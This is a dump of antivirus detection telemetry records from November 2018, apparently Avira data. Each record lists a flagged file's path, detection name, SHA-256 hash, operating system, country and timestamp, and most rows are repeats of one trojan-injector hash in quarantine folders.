  Row(detection=Row(filename='avscan-20181102-061849-21e58948', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061849-21E58948', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061756-02233b3c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061756-02233B3C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055649-0eee73c1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055649-0EEE73C1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062029-5d9a2566', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062029-5D9A2566', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062431-ede7b8d4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062431-EDE7B8D4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050421-bae93665', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050421-BAE93665', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:04:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055045-3626756e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055045-3626756E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053630-3855ffc1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053630-3855FFC1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055532-e13fe308', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055532-E13FE308', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055517-d86edd20', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055517-D86EDD20', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052758-07630430', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052758-07630430', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:27:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055342-9fbbf1d8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055342-9FBBF1D8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061813-0c64e2a1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061813-0C64E2A1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060328-fce944db', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060328-FCE944DB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061744-fb6c2503', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061744-FB6C2503', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054743-c994a8c6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054743-C994A8C6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061648-d9c38778', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061648-D9C38778', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:16:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050914-699867d7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050914-699867D7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:09:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061835-19dd2a2c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061835-19DD2A2C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053524-1171c1f8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053524-1171C1F8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060653-773fd318', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060653-773FD318', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:06:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054908-fc70440c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054908-FC70440C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:49:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061711-e7873954', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061711-E7873954', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055003-1d150dac', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055003-1D150DAC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T17:50:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060248-e500a9cf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060248-E500A9CF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:02:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055447-c6573eaa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055447-C6573EAA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:54:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054147-f5910a4c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054147-F5910A4C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:41:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051247-e884a4bd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051247-E884A4BD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:12:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053601-2765d9ef', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053601-2765D9EF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053520-0f18c1ee', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053520-0F18C1EE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='package_764_xml.js.zip', filepath='S:\\dasi\\LwS\\Server\\DConcept\\HtmlHelp\\XCONCEPT_HILFE\\WHXDATA\\PACKAGE_764_XML.JS.zip', filesize=4000, name='HEUR/Suspar.Gen.#M1.#R1'), hash='8172c85bfccbdf9b8fcf165c6ad31824535fc0ab9e28364d55d6fd67f60572d8', metadata=Row(cmdline='C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Documents\\\\\\\\PersBackup\\\\\\\\dasi.buj \\\\\\/force \\\\\\/speed:fast \\\\\\/mode:full', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Personal Backup 5\\Persbackup.exe', parentsize=10769920, timestamp='2018-11-02T21:34:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054127-e99bf35d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054127-E99BF35D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:41:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062214-9c6a2a46', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062214-9C6A2A46', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:22:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055416-b3eb1d79', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055416-B3EB1D79', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:54:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051721-8bb29029', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051721-8BB29029', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:17:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060933-d655a9b0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060933-D655A9B0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:09:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='audiodg.exe', filepath='C:\\Windows\\System32\\audiodg.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='74ca4f86f469951767854c606368be43b4d9d4670b014b16b252ef8dd056b442', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T04:15:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052537-b33c61ae', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052537-B33C61AE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:25:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055746-3137987e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055746-3137987E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:57:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051454-3413f93d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051454-3413F93D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055451-c8e910e6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055451-C8E910E6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:54:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060929-d40aee38', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060929-D40AEE38', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:09:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054815-dce84baa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054815-DCE84BAA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:48:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053822-7b7b7b6e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053822-7B7B7B6E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:38:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060214-d0da87ed', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060214-D0DA87ED', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:02:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='listvtg.exe', filepath='C:\\OpenEdge\\OpenEdge\\proedit\\win\\listvtg.exe', filesize=512000, name='W32/Alman.BB.#M1.#R1'), hash='75ff397d095aeb68f73c2da8517e6bb9b9a4d9fafc732547a45374a8a5a76342', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:43:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060227-d8c1f18b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060227-D8C1F18B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:02:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='srv64', filepath='\\?\\C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:29:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='spinstall.exe', filepath='G:\\SPDMTK FILES\\Lenovo\\Lenovo_A606_S039_150604_ROW_(by_firmwarefile.com)\\Lenovo_A606_S039_150604_ROW\\Driver\\Auto Installer Driver v1.1236.00\\SmartPhoneDriver\\x86\\spinstall.exe', filesize=640000, name='W32/Sality.AG.#M1.#R1'), hash='26a1024a60ce7cd98daedd9eb498992487bb68d14863353108f6eded6ad73c7a', metadata=Row(cmdline='\\\\\\/onboot', country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WWW.HOSTJSC.NET\\Internet Download Manager\\IDMan.exe', parentsize=990720, timestamp='2018-11-01T03:50:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-105501-1d7c11c0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_735ad0b6\\AVSCAN-20181101-105351-10D64745\\AVSCAN-20181101-105501-1D7C11C0', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:55:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155153-982b5695', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155153-982B5695', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:51:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-171519-a3547a71', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cae6e045\\AVSCAN-20181101-171403-95C619DC\\AVSCAN-20181101-171519-A3547A71', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:15:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-070845-7d52d3a3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9d1bc712\\AVSCAN-20181101-070830-7AB635C1\\AVSCAN-20181101-070845-7D52D3A3', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:39:01Z'), dt=datetime.date(2018, 11, 1)),
